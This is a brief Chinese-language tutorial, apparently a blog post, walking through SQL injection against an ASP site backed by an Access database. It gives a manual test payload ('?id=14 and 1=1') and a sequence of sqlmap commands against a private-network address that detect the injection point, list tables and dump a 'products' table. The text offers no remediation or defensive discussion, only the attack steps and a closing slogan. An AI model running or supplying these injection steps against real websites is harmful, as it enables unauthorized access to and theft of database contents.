简介

        Access数据库注入攻击是一种常见的网络安全，通过注入SQL代码来获取未授权的数据访问权限。这种攻击利用了应用程序与数据库之间的交互漏洞，攻击者通过输入特定的SQL代码片段来操纵数据库查询，从而绕过应用程序的安全机制，获取信息或执行操作。

 以下是具体的操作流程：

1、打开⽹⻚判断是否存在注⼊

使用命令 ?id=14 and 1=1  确定为数字注入

2、⽤sqlmap⼯具扫描注⼊点

使用kali自带sqlmap系统

使用语句  sqlmap -u http://192.168.10.101/news_view.asp?id=14

如下图则说明存在sql注⼊

3、查询表名

因为access数据库没有库，使用语句  sqlmap -u http://192.168.10.101/news_view.asp?id=14 --tables --batch  即可查询表名

 

4、查询列名

使用语句  sqlmap -u http://192.168.10.101/news_view.asp?id=14 -T products --dump --batch

以此可以得出相关数据

安全

网络安全靠人民，网络安全为人民